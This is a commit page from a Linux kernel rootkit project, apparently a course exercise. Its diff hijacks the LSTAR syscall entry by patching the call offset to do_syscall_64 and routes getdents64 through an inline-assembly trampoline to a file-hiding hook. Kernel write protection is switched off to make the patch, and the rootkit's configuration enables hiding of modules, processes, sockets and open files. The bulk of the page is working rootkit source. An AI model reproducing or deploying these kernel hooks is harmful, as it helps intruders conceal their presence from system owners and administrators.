linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 81c0c77a8f26504f2e25a09a22e78149c690caa9
parent cb19796b3001905fc422fa9912b21de1fc661eb3
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 10 Jan 2021 14:54:23 +0100

It works?!

Diffstat:

Msrc/filehide_lstar.c | 23++++++++++++++++++++---


Msrc/g7.c | 2+-


2 files changed, 21 insertions(+), 4 deletions(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -40,6 +40,7 @@ static char *find_do_syscall_64(char *lstar_addr);
 
 void g7_syscall_64(unsigned long, struct pt_regs *);
 void (*do_syscall_64)(unsigned long, struct pt_regs *);
+void check_getdents64(void);
 static char *syscall_64_ptr;
 static unsigned long oldOff;
 
@@ -54,11 +55,14 @@ hide_files_lstar(void)
 
     //Calculate new call offset to our function
     //newOff = g7_syscall_64_addr - nextOpcodeAddr
-    unsigned long newOff = (unsigned long)g7_syscall_64 - ((unsigned long)syscall_64_ptr + 5);
+    unsigned long newOff = (unsigned long)check_getdents64 - ((unsigned long)syscall_64_ptr + 5);
 
     disable_protection();
+    memcpy((void *)check_getdents64, "\x90\x90\x90\x90\x90", 5);
     memcpy((syscall_64_ptr + 1), &newOff, 4);
     enable_protection();
+
+    hexdump((char *)check_getdents64, 32);
 }
 
 void
@@ -67,11 +71,12 @@ unhide_files_lstar(void)
     disable_protection();
     memcpy((syscall_64_ptr + 1), &oldOff, 4);
     enable_protection();
-    while (atomic_read(&syscall64_count) > 0)
-        msleep(250);
+    if (atomic_read(&syscall64_count) > 0)
+        msleep(10000);
 }
 
 //Only use with multiples of 16..
+//Best friend for this exercise, alongside https://defuse.ca/online-x86-assembler.htm
 static void
 hexdump(char *addr, int n)
 {
@@ -136,6 +141,17 @@ find_do_syscall_64(char *lstar_addr)
 }
 
 void
+check_getdents64(void)
+{
+    __asm__ volatile (
+        "\tcmp $217, %%rdi\n"
+        "\tje g7_syscall_64\n"
+        "\tjmp *%0\n"
+        :: "r"(do_syscall_64)
+    );
+}
+
+void
 g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
 {
     atomic_inc(&syscall64_count);
@@ -143,6 +159,7 @@ g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
 
 
     if (nr == __NR_getdents64) {
+        DEBUG_INFO("We are here!\n");
         //  
         //  ( ͡°Ĺ̯ ͡° )
         //
diff --git a/src/g7.c b/src/g7.c
@@ -41,7 +41,7 @@ static struct file_operations g7_fops =
 
 rootkit_t rootkit = {
     .hiding_module  = true,
-    .hiding_files   = true,
+    .hiding_files   = false,
     .hiding_open    = true,
     .hiding_pids    = true,
     .hiding_sockets = true,